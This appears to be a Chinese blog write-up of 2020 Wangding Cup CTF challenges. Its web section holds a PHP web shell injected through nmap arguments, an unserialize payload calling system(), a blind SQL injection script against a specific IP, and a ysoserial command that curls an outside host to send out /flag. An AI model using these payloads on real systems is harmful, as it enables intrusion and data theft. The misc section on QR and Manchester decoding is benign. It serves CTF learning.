南溟丷

我想在那里最蓝的大海扬帆

0%

2020 网鼎杯 朱雀之战 部分题解

。赛后秒个题。

Web

nmap

这题考过挺多次了,在线工具

1
' <?php eval($_POST[south]);?> -oN shell.phtml '

phpweb

p=index.php&func=readfile拿到源代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p);
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("Hacker...");
}
}
?>

反序列化绕过。

1
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:26:"cat /tmp/flag_c6bf23b35ba2";s:4:"func";s:6:"system";}

think_java

给了源码,反编译。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
public static Connection getConnection(String dbName, String user, String pass) {
Connection conn = null;
try {
Class.forName("com.mysql.jdbc.Driver");
if (dbName != null && !dbName.equals("")) {
dbName = "jdbc:mysql://mysqldbserver:3306/" + dbName;
} else {
dbName = "jdbc:mysql://mysqldbserver:3306/myapp";
}
if (user == null || dbName.equals(""))
user = "root";
if (pass == null || dbName.equals(""))
pass = "abc@12345";
conn = DriverManager.getConnection(dbName, user, pass);
} catch (ClassNotFoundException var5) {
var5.printStackTrace();
} catch (SQLException var6) {
var6.printStackTrace();
}
return conn;
}

JDBC注入,dbName?后跟参数表示链接数据库的配置,错误配置会被忽略,因此利用这点注入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

session = requests.Session()
res = ""
command = "database()"
for i in range(1, 40):
for j in range(33, 127):
paramsPost = {"x": "",
"dbName": "myapp?south=1' or if((mid({command},{position},1)='{value}'),1,0)\x23".format(
command=command, position=i, value=chr(j))}
response = session.post("http://123.56.249.239:8088/common/test/sqlDict", data=paramsPost)
print(paramsPost, len(response.text))
if len(response.text) > 534:
res += chr(j)
print(res)
break

得到账号密码,admin@Rrrr_ctf_asde/admin

Spring boot有个swagger-ui.html页面用作测试,登陆后给了一串token,推测是个反序列化漏洞,但没给web.xml

ysoserial挨个试,到ROME可用。

1
java -jar ./ysoserial.jar ROME "curl http://122.51.113.164/?`cat /flag`" |base64

Misc

九宫格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import os
from pyzbar.pyzbar import decode
from PIL import Image

path = "./QRcode/"
images = os.listdir(path)
images.sort(key=lambda x: int(x[:-4]))
res = ""
for i in images:
img = Image.open(path + i)
barcodes = decode(img)
for barcode in barcodes:
res += barcode.data.decode("utf-8")
b = res.replace("zero", "0").replace("one", "1")
d = int(b, 2)
h = hex(d)
print(bytes.fromhex(h[2:]))

# b'U2FsdGVkX19jThxWqKmYTZP1X4AfuFJ/7FlqIF1KHQTR5S63zOkyoX36nZlaOq4X4klwRwqa'

读一下二维码,结果加了盐,根据提示,九宫格的对角线为245568Rabbit解密。

key123

根据提示输入密码为123,得到两个图。

匙.png修复高度。

1
295965569a596696995a9aa969996a6a9a669965656969996959669566a5655699669aa5656966a566a56656

差分曼彻斯特。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import struct
import math


def long_to_bytes(n):
s = b''
pack = struct.pack
while n > 0:
s = pack('>I', n & 0xffffffff) + s
n = n >> 32
for i in range(len(s)):
if s[i] != b'\000'[0]:
break
else:
s = b'\000'
i = 0
s = s[i:]
return s

def MCST_diff(str_bin):
ret = ''
for i in range(0, len(str_bin) // 2 - 1):
x1 = str_bin[i * 2:i * 2 + 2]
x2 = str_bin[i * 2 + 2:i * 2 + 4]
if x1 == x2:
ret += '0'
else:
ret += '1'
return ret


str_hex = '295965569a596696995a9aa969996a6a9a669965656969996959669566a5655699669aa5656966a566a56656'
str_bin = str(bin(int(str_hex, 16)))[2:]
m = MCST_diff(str_bin)
print(long_to_bytes(int(m, 2)))

# b'\x13akura_Love_Strawberry'

猜个前面是S,密码为Sakura_Love_Strawberry

binwalk解析锁.png,拿到加密文件,输入密码,得到flag